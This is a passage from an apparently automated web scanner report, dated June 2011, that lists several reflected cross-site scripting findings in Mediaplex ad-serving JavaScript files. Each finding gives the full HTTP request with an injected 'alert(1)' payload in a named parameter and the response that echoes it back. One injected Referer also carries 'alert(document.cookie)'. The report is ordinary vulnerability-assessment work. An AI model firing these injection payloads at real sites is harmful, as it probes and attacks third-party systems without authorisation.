Referer: http://ad.yieldmanager.com/iframe3?mTsCACJqCwC3E5MAAAAAADPOJAAAAAAAAgAAAAYAAAAAAP8AAAACB4FnFAAAAAAAuowIAAAAAAA0RjAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADx4gUAAAAAAAIAAwAAAAAAUrgeheuRCECamZmZmZkKQM8tcer33BlAAAAAAAAAHEDQLXHq99wZQAAAAAAAABxAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACOmofmodM-CgUplvRSzdlkmEMRVc6kOd6J3c5dAAAAAA==,,http%3A%2F%2Fthesouthern.com%2Fsports%2Fbasketball%2Farticle_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html%3Fc03b0%22-alert%28document.cookie%29-%225958ea17fd2%3D1,Z%3D728x90%26_salt%3D1188639314%26anmember%3D514%26anprice%3D220%26r%3D1%26s%3D748066,2461b716-95ad-11e0-a25e-e36c5a3762ba
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo1=s/137381247401/80; mojo2=14302:16279/13198:5934; mojo3=12309:23636/17038:20406/9966:1105/17550:1884/15017:13113/14302:40017/1551:9866/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/9608:1178/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:20:38 GMT
Server: Apache
Last-Modified: Fri, 27 May 2011 15:56:55 GMT
ETag: "63cd71-1097-4a443fca0bfc0"
Accept-Ranges: bytes
Content-Length: 7313
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
<script type=\"text/javascript\" src=\"http://rt.legolas-media.com/lgrt?ci=2&ti=3613ac9f";alert(1)//5d50101527c\">
...[SNIP]...

4.200. http://img.mediaplex.com/content/0/12309/129868/1361274_us_smb_q1w12_728x90_mcsft_firstserver_dtp1a.js [mpvc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/12309/129868/1361274_us_smb_q1w12_728x90_mcsft_firstserver_dtp1a.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 10a3b"%3balert(1)//8f7438fcea1 was submitted in the mpvc parameter. This input was echoed as 10a3b";alert(1)//8f7438fcea1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/12309/129868/1361274_us_smb_q1w12_728x90_mcsft_firstserver_dtp1a.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F12309-129868-23636-1%3Fmpt%3D6245544&mpjs=rt.legolas-media.com%2Flgrt%3Fci%3D2%26ti%3D361&mpt=6245544&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b25/17/1e8/%2a/n%3B241904200%3B0-0%3B4%3B40342997%3B3454-728/90%3B42422626/42440413/1%3Bu%3Drmxli_3163700|surl_http%3A//thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html%3B%7Esscs%3D%3fhttp://ad.yieldmanager.com/clk?2,13%3Becb025846c58424b%3B13088ae1ef6,0%3B%3B%3B4270644083,mTsCACJqCwC3E5MAAAAAADPOJAAAAAAAAgAAAAYAAAAAAP8AAAACB4FnFAAAAAAAuowIAAAAAAA0RjAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADx4gUAAAAAAAIAAwAAAAAA9R6uiDABAAAAAAAAADI0NjFiNzE2LTk1YWQtMTFlMC1hMjVlLWUzNmM1YTM3NjJiYQAAAAAAAAA=,,http%3A%2F%2Fthesouthern.com%2Fsports%2Fbasketball%2Farticle_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html%3Fc03b0%22-alert%28document.cookie%29-%225958ea17fd2%3D1,10a3b"%3balert(1)//8f7438fcea1 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?mTsCACJqCwC3E5MAAAAAADPOJAAAAAAAAgAAAAYAAAAAAP8AAAACB4FnFAAAAAAAuowIAAAAAAA0RjAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADx4gUAAAAAAAIAAwAAAAAAUrgeheuRCECamZmZmZkKQM8tcer33BlAAAAAAAAAHEDQLXHq99wZQAAAAAAAABxAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACOmofmodM-CgUplvRSzdlkmEMRVc6kOd6J3c5dAAAAAA==,,http%3A%2F%2Fthesouthern.com%2Fsports%2Fbasketball%2Farticle_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html%3Fc03b0%22-alert%28document.cookie%29-%225958ea17fd2%3D1,Z%3D728x90%26_salt%3D1188639314%26anmember%3D514%26anprice%3D220%26r%3D1%26s%3D748066,2461b716-95ad-11e0-a25e-e36c5a3762ba
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo1=s/137381247401/80; mojo2=14302:16279/13198:5934; mojo3=12309:23636/17038:20406/9966:1105/17550:1884/15017:13113/14302:40017/1551:9866/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/9608:1178/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:20:40 GMT
Server: Apache
Last-Modified: Fri, 27 May 2011 15:56:55 GMT
ETag: "63cd71-1097-4a443fca0bfc0"
Accept-Ranges: bytes
Content-Length: 7399
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
AAAADI0NjFiNzE2LTk1YWQtMTFlMC1hMjVlLWUzNmM1YTM3NjJiYQAAAAAAAAA=,,http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html?c03b0"-alert(document.cookie)-"5958ea17fd2=1,10a3b";alert(1)//8f7438fcea1");
mpvc = mpvclick;
}
else if (mpvce == 2) {
mpvclick2 = encodeURIComponent("http://ad.doubleclick.net/click;h=v8/3b25/17/1e8/*/n;241904200;0-0;4;40342997;3454-728/90;42422626/42440413/1;u=rmxli_31637
...[SNIP]...

4.201. http://img.mediaplex.com/content/0/12309/129868/1361274_us_smb_q1w12_728x90_mcsft_firstserver_dtp1a.js [mpvc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/12309/129868/1361274_us_smb_q1w12_728x90_mcsft_firstserver_dtp1a.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 40bd0'%3balert(1)//fe1c49865b3 was submitted in the mpvc parameter. This input was echoed as 40bd0';alert(1)//fe1c49865b3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/12309/129868/1361274_us_smb_q1w12_728x90_mcsft_firstserver_dtp1a.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F12309-129868-23636-1%3Fmpt%3D6245544&mpjs=rt.legolas-media.com%2Flgrt%3Fci%3D2%26ti%3D361&mpt=6245544&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b25/17/1e8/%2a/n%3B241904200%3B0-0%3B4%3B40342997%3B3454-728/90%3B42422626/42440413/1%3Bu%3Drmxli_3163700|surl_http%3A//thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html%3B%7Esscs%3D%3fhttp://ad.yieldmanager.com/clk?2,13%3Becb025846c58424b%3B13088ae1ef6,0%3B%3B%3B4270644083,mTsCACJqCwC3E5MAAAAAADPOJAAAAAAAAgAAAAYAAAAAAP8AAAACB4FnFAAAAAAAuowIAAAAAAA0RjAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADx4gUAAAAAAAIAAwAAAAAA9R6uiDABAAAAAAAAADI0NjFiNzE2LTk1YWQtMTFlMC1hMjVlLWUzNmM1YTM3NjJiYQAAAAAAAAA=,,http%3A%2F%2Fthesouthern.com%2Fsports%2Fbasketball%2Farticle_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html%3Fc03b0%22-alert%28document.cookie%29-%225958ea17fd2%3D1,40bd0'%3balert(1)//fe1c49865b3 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?mTsCACJqCwC3E5MAAAAAADPOJAAAAAAAAgAAAAYAAAAAAP8AAAACB4FnFAAAAAAAuowIAAAAAAA0RjAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADx4gUAAAAAAAIAAwAAAAAAUrgeheuRCECamZmZmZkKQM8tcer33BlAAAAAAAAAHEDQLXHq99wZQAAAAAAAABxAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACOmofmodM-CgUplvRSzdlkmEMRVc6kOd6J3c5dAAAAAA==,,http%3A%2F%2Fthesouthern.com%2Fsports%2Fbasketball%2Farticle_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html%3Fc03b0%22-alert%28document.cookie%29-%225958ea17fd2%3D1,Z%3D728x90%26_salt%3D1188639314%26anmember%3D514%26anprice%3D220%26r%3D1%26s%3D748066,2461b716-95ad-11e0-a25e-e36c5a3762ba
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo1=s/137381247401/80; mojo2=14302:16279/13198:5934; mojo3=12309:23636/17038:20406/9966:1105/17550:1884/15017:13113/14302:40017/1551:9866/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/9608:1178/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:20:42 GMT
Server: Apache
Last-Modified: Fri, 27 May 2011 15:56:55 GMT
ETag: "63cd71-1097-4a443fca0bfc0"
Accept-Ranges: bytes
Content-Length: 7399
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
AAAADI0NjFiNzE2LTk1YWQtMTFlMC1hMjVlLWUzNmM1YTM3NjJiYQAAAAAAAAA=,,http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html?c03b0"-alert(document.cookie)-"5958ea17fd2=1,40bd0';alert(1)//fe1c49865b3http://altfarm.mediaplex.com/ad/ck/12309-129868-23636-1?mpt=6245544" target="_blank">
...[SNIP]...

4.202. http://img.mediaplex.com/content/0/14302/119028/clean_mycustomers_728x90.js [mpck parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/14302/119028/clean_mycustomers_728x90.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a4cc8"%3balert(1)//ed47b532746 was submitted in the mpck parameter. This input was echoed as a4cc8";alert(1)//ed47b532746 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/14302/119028/clean_mycustomers_728x90.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F14302-119028-2056-13%3Fmpt%3D1367093073a4cc8"%3balert(1)//ed47b532746&mpt=1367093073&mpvc=http://adclick.g.doubleclick.net/aclk%253Fsa%253Dl%2526ai%253DBW9kOpf_1TfuoBIz8lQfWy_CtCNaooYACvvr7-xiemNXWTPDUlAMQARgBIJConBM4AFCOi6m_______8BYMnW8obIo_waoAGC5ITwA7IBD3d3dy50d2Fja2xlLmNvbboBCTcyOHg5MF9hc8gBCdoBIGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVz4AEDuAIYwAIFyALomuEKqAMB0QPgy9uX8AkKYegDiALoA7UI9QMAAADE%2526num%253D1%2526sig%253DAGiWqtynvhOcQ9qzIiL5G8UK6GZUkwSkbA%2526client%253Dca-pub-7494156027018342%2526adurl%253D&placementid=14302119028205613& HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307985396&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307967395573&bpp=3&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054%2C0180034002&correlator=1307967395282&frm=4&adk=4288629557&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1840987920&ga_fc=1&u_tz=-300&u_his=17&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=3&dtd=803&xpc=mcyiAGkaHy&p=http%3A//www.twackle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo1=s/137381247401/80; mojo2=14302:16279/13198:5934; mojo3=14302:2056/12760:2414/17038:20406/12309:23636/9966:1105/17550:1884/15017:13113/1551:9866/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/9608:1178/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 12:17:16 GMT
Server: Apache
Last-Modified: Wed, 06 Apr 2011 21:53:49 GMT
ETag: "688390-ccf-4a04707185540"
Accept-Ranges: bytes
Content-Length: 9641
Content-Type: application/x-javascript

function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"] && navigator.mimeTypes["application/x-shockwave-flash"].
...[SNIP]...
0QPgy9uX8AkKYegDiALoA7UI9QMAAADE%26num%3D1%26sig%3DAGiWqtynvhOcQ9qzIiL5G8UK6GZUkwSkbA%26client%3Dca-pub-7494156027018342%26adurl%3Dhttp://altfarm.mediaplex.com/ad/ck/14302-119028-2056-13?mpt=1367093073a4cc8";alert(1)//ed47b532746\" target=\"_blank\">
...[SNIP]...

4.203. http://img.mediaplex.com/content/0/14302/119028/clean_mycustomers_728x90.js [mpvc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/14302/119028/clean_mycustomers_728x90.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 284d5"%3balert(1)//83630fb7d9e was submitted in the mpvc parameter. This input was echoed as 284d5";alert(1)//83630fb7d9e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/14302/119028/clean_mycustomers_728x90.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F14302-119028-2056-13%3Fmpt%3D1367093073&mpt=1367093073&mpvc=http://adclick.g.doubleclick.net/aclk%253Fsa%253Dl%2526ai%253DBW9kOpf_1TfuoBIz8lQfWy_CtCNaooYACvvr7-xiemNXWTPDUlAMQARgBIJConBM4AFCOi6m_______8BYMnW8obIo_waoAGC5ITwA7IBD3d3dy50d2Fja2xlLmNvbboBCTcyOHg5MF9hc8gBCdoBIGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVz4AEDuAIYwAIFyALomuEKqAMB0QPgy9uX8AkKYegDiALoA7UI9QMAAADE%2526num%253D1%2526sig%253DAGiWqtynvhOcQ9qzIiL5G8UK6GZUkwSkbA%2526client%253Dca-pub-7494156027018342%2526adurl%253D284d5"%3balert(1)//83630fb7d9e&placementid=14302119028205613& HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307985396&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307967395573&bpp=3&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054%2C0180034002&correlator=1307967395282&frm=4&adk=4288629557&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1840987920&ga_fc=1&u_tz=-300&u_his=17&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=3&dtd=803&xpc=mcyiAGkaHy&p=http%3A//www.twackle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo1=s/137381247401/80; mojo2=14302:16279/13198:5934; mojo3=14302:2056/12760:2414/17038:20406/12309:23636/9966:1105/17550:1884/15017:13113/1551:9866/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/9608:1178/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 12:17:18 GMT
Server: Apache
Last-Modified: Wed, 06 Apr 2011 21:53:49 GMT
ETag: "688390-ccf-4a04707185540"
Accept-Ranges: bytes
Content-Length: 9617
Content-Type: application/x-javascript

function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"] && navigator.mimeTypes["application/x-shockwave-flash"].
...[SNIP]...
oBIGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVz4AEDuAIYwAIFyALomuEKqAMB0QPgy9uX8AkKYegDiALoA7UI9QMAAADE%26num%3D1%26sig%3DAGiWqtynvhOcQ9qzIiL5G8UK6GZUkwSkbA%26client%3Dca-pub-7494156027018342%26adurl%3D284d5";alert(1)//83630fb7d9ehttp://altfarm.mediaplex.com%2Fad%2Fck%2F14302-119028-2056-13%3Fmpt%3D1367093073&clickTag=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBW9kOpf_1TfuoBIz8lQfWy_CtCNaooYACvvr7-xiemNXWTPDUlAMQARgB
...[SNIP]...

4.204. http://img.mediaplex.com/content/0/14302/119028/clean_mycustomers_728x90.js [placementid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/14302/119028/clean_mycustomers_728x90.js

Issue detail

The value of the placementid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload acdab"%3balert(1)//10b03c91fa9 was submitted in the placementid parameter. This input was echoed as acdab";alert(1)//10b03c91fa9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/14302/119028/clean_mycustomers_728x90.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F14302-119028-2056-13%3Fmpt%3D1367093073&mpt=1367093073&mpvc=http://adclick.g.doubleclick.net/aclk%253Fsa%253Dl%2526ai%253DBW9kOpf_1TfuoBIz8lQfWy_CtCNaooYACvvr7-xiemNXWTPDUlAMQARgBIJConBM4AFCOi6m_______8BYMnW8obIo_waoAGC5ITwA7IBD3d3dy50d2Fja2xlLmNvbboBCTcyOHg5MF9hc8gBCdoBIGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVz4AEDuAIYwAIFyALomuEKqAMB0QPgy9uX8AkKYegDiALoA7UI9QMAAADE%2526num%253D1%2526sig%253DAGiWqtynvhOcQ9qzIiL5G8UK6GZUkwSkbA%2526client%253Dca-pub-7494156027018342%2526adurl%253D&placementid=14302119028205613acdab"%3balert(1)//10b03c91fa9& HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307985396&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307967395573&bpp=3&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054%2C0180034002&correlator=1307967395282&frm=4&adk=4288629557&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1840987920&ga_fc=1&u_tz=-300&u_his=17&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=3&dtd=803&xpc=mcyiAGkaHy&p=http%3A//www.twackle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo1=s/137381247401/80; mojo2=14302:16279/13198:5934; mojo3=14302:2056/12760:2414/17038:20406/12309:23636/9966:1105/17550:1884/15017:13113/1551:9866/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/9608:1178/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 12:17:21 GMT
Server: Apache
Last-Modified: Wed, 06 Apr 2011 21:53:49 GMT
ETag: "688390-ccf-4a04707185540"
Accept-Ranges: bytes
Content-Length: 9281
Content-Type: application/x-javascript

function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"] && navigator.mimeTypes["application/x-shockwave-flash"].
...[SNIP]...
<img src=\"http://imp.constantcontact.com/imp/cmp.jsp?impcc=IMP_14302119028205613acdab";alert(1)//10b03c91fa9&o=http://img.constantcontact.com/lp/images/standard/spacer.gif\" height=\"1\" width=\"1\" alt=\"\" style='position:absolute'>
...[SNIP]...

4.205. http://img.mediaplex.com/content/0/17038/128465/Roxy_728x90_Female_Bed_v2.js [mpck parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/17038/128465/Roxy_728x90_Female_Bed_v2.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f8a7b"%3balert(1)//99d79319247 was submitted in the mpck parameter. This input was echoed as f8a7b";alert(1)//99d79319247 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/17038/128465/Roxy_728x90_Female_Bed_v2.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F17038-128465-20406-11%3Fmpt%3D4df5ee708d29cf8a7b"%3balert(1)//99d79319247&mpt=4df5ee708d29c&mpvc=http://www30a2.glam.com/gad/click.act?0339-_gclickid=gaclk4df5ee708e621-_advid=50002325-_adid=5000042624-_crid=500030953-_aipid=201106130347-_ge_=1^2^adf7d753c2cad14637ca99c7d3d008a2-ord=4876240110024810-afid=1000212071-dsid=864279-sz=728x90-zone=/-sid=115232130551023312111-tile=3-seq=1-tt=j-atf=0-url=txanco-flg=64-u=b0033fawbst1ssbzd4i,f0f02sa,g10001s-_gclick_gaclk4df5ee708e621 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/2011/06/13/10-observations-dallas-mavs-finals/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo1=s/137381247401/80; mojo2=14302:16279/13198:5934; mojo3=17038:20406/9966:1105/17550:1884/15017:13113/12309:3981/14302:40017/1551:9866/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/9608:1178/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:03:50 GMT
Server: Apache
Last-Modified: Mon, 23 May 2011 13:05:23 GMT
ETag: "597796-f11-4a3f11fcfcac0"
Accept-Ranges: bytes
Content-Length: 10090
Content-Type: application/x-javascript

function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"] && navigator.mimeTypes["application/x-shockwave-flash"].
...[SNIP]...
15232130551023312111-tile=3-seq=1-tt=j-atf=0-url=txanco-flg=64-u=b0033fawbst1ssbzd4i,f0f02sa,g10001s-_gclick_gaclk4df5ee708e621http://altfarm.mediaplex.com/ad/ck/17038-128465-20406-11?mpt=4df5ee708d29cf8a7b";alert(1)//99d79319247\" target=\"_blank\">
...[SNIP]...

4.206. http://img.mediaplex.com/content/0/17038/128465/Roxy_728x90_Female_Bed_v2.js [mpt parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/17038/128465/Roxy_728x90_Female_Bed_v2.js

Issue detail

The value of the mpt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e361"%3balert(1)//aa7427f2e0c was submitted in the mpt parameter. This input was echoed as 3e361";alert(1)//aa7427f2e0c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/17038/128465/Roxy_728x90_Female_Bed_v2.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F17038-128465-20406-11%3Fmpt%3D4df5ee708d29c&mpt=4df5ee708d29c3e361"%3balert(1)//aa7427f2e0c&mpvc=http://www30a2.glam.com/gad/click.act?0339-_gclickid=gaclk4df5ee708e621-_advid=50002325-_adid=5000042624-_crid=500030953-_aipid=201106130347-_ge_=1^2^adf7d753c2cad14637ca99c7d3d008a2-ord=4876240110024810-afid=1000212071-dsid=864279-sz=728x90-zone=/-sid=115232130551023312111-tile=3-seq=1-tt=j-atf=0-url=txanco-flg=64-u=b0033fawbst1ssbzd4i,f0f02sa,g10001s-_gclick_gaclk4df5ee708e621 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/2011/06/13/10-observations-dallas-mavs-finals/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo1=s/137381247401/80; mojo2=14302:16279/13198:5934; mojo3=17038:20406/9966:1105/17550:1884/15017:13113/12309:3981/14302:40017/1551:9866/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/9608:1178/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:03:53 GMT
Server: Apache
Last-Modified: Mon, 23 May 2011 13:05:23 GMT
ETag: "597796-f11-4a3f11fcfcac0"
Accept-Ranges: bytes
Content-Length: 9702
Content-Type: application/x-javascript

function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"] && navigator.mimeTypes["application/x-shockwave-flash"].
...[SNIP]...
ined') {adldspsend(mcdt);}
    else { setTimeout('w_adldspsend ("'+mcdt.replace(/"/g, '\\"')+'")',200); }
   }
   var mcdt='3817/'+ cl +'/'+ cm +'/'+ m +'/7566918/7566918/'+ st +'/[SiteName]/4df5ee708d29c3e361";alert(1)//aa7427f2e0c';
   w_adldspsend(mcdt);

4.207. http://img.mediaplex.com/content/0/17038/128465/Roxy_728x90_Female_Bed_v2.js [mpvc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/17038/128465/Roxy_728x90_Female_Bed_v2.js

Issue detail

